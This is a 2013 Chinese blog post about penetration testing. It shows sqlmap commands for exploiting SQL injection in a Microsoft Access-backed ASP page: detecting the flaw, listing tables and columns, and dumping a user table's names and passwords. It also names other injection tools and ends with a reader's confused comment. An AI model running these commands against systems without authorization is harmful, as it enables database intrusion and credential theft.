A-A+

Access简单注入之Sqlmap

2013年11月11日 渗透测试 评论 1 条 阅读 4,996 次

sqlmap是一个功能很强大的渗透测试工具,而且源码开放。

支持的数据库:MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access、SQLite等等

环境:BT5+sqlmap

温馨提示:在BT5里打开应用快捷键Alt+F2(或Fn+Alt+F2),在弹出的栏目里输入你想要使用的工具就可以了。还有一些快捷键像Tab补齐,大家自己去摸索,慢慢记!

简单说一下关于sqlmap下access注入:

注入漏洞:http://www.example.com/showannounce.asp?id=104

会用到一些简单命令如下,意思大家一看也就明白了。

./sqlmap.py -u "http://www.example.com/showannounce.asp?id=104"  【Kali下使用:sqlmap -u "http://jgkd.xxx.com/announceshow.asp?id=203"】

./sqlmap.py -u "http://www.example.com/showannounce.asp?id=104" --tables

./sqlmap.py -u "http://www.example.com/showannounce.asp?id=104" --columns -T user

./sqlmap.py -u "http://www.example.com/showannounce.asp?id=104" --dump -T user -C "name,psw"

中间会提示让你输入线程,输入大概5到10个线程这个样子。上面的user,psw这些视情况而定,灵活应用。还有如果不熟悉bt5或没有linux环境的,用啊D,明小子、穿山甲等去跑也可以,前提是你字典够强大,说一个题外话养成一个收集的好习惯!

标签:

1 条留言  访客:1 条  博主:0 条

  1. 小白

    意思根本看不懂好么!!!!!

给我留言